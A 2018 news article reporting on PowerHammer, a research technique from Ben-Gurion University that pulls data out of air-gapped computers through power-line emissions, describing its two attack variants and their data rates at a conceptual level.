Posted on April 13, 2018 at 4:53 PM
A team of researchers from Israel’s Ben-Gurion University of the Negev, known for their innovative hacks and inventions, managed to develop a new malware that is capable of extracting data from computers through power lines. The malware was named PowerHammer.
Researchers from Israel have managed to create a malware that can get data from any air-gapped computer, and to do so, it uses power lines. The so-called PowerHammer technique can infect computers and alter the utilization levels of the computer’s CPU. By doing so, they can cause an increased or decreased use of electricity.
The way computers usually work is by extracting a certain amount of power from the network. By using the newly-developed technique, researchers have managed to cause a phenomenon called “conducted emission.” Basically, they can choose which amount of power will the device draw from the network. Doing this can allow the malware to encode binary data, and turn it into a pattern based on power consumption.
Two different types of PowerHammer attacks
In order to get the desired data, a potential attacker will first have to tap into the electrical network that their victim uses. Only after that will they be able to read the variations of power consumption, and use this knowledge to decode the data.
There are two different attacks that this method can perform, and which will be used depends on where the attacker decides to tap into the electrical network.
The first attack is power-hammering at the line level, and it happens after the attacker taps the power cable somewhere in between the electrical socket, and the air-gapped device. The speed of extraction, in this case, will be at 1,000 bits per second.
The other type is power-hammering at phase level, and this is the type that happens when the power lines are tapped at the phase level. To do this, the attacker needs to access the electrical panel of the building. This is a more discreet and stealthy way of extracting info, but it is also very slow. The data recovery moves at only 10 bits per second,
The attacker only needs standard electrical equipment
In order to tap into the victim’s electrical network, the attacker actually doesn’t need any advanced equipment. All it takes is a regular split-core transformer that works on pretty much any electrical line. The device, so-called “probe”, can also be used for sending the data through WiFi to any computer stashed nearby. This means that data-collecting can even be performed from a distance, and the attacker doesn’t even have to connect to the device.
Through their research, experts discovered that this method can steal data from laptops, desktops, servers, as well as IoT devices, as long as they are air-gapped. The only difficulty lies with IoT devices, due to the even slower extraction speed. However, the speed increases with more infected CPUs.
More details about this process can be found in the team’s paper. One thing worth noting is the fact that this malware was created for experimental purposes only. Any use of this method for stealing data in an actual attack will only be performed by intelligence agencies since it is not something that normal users have access to.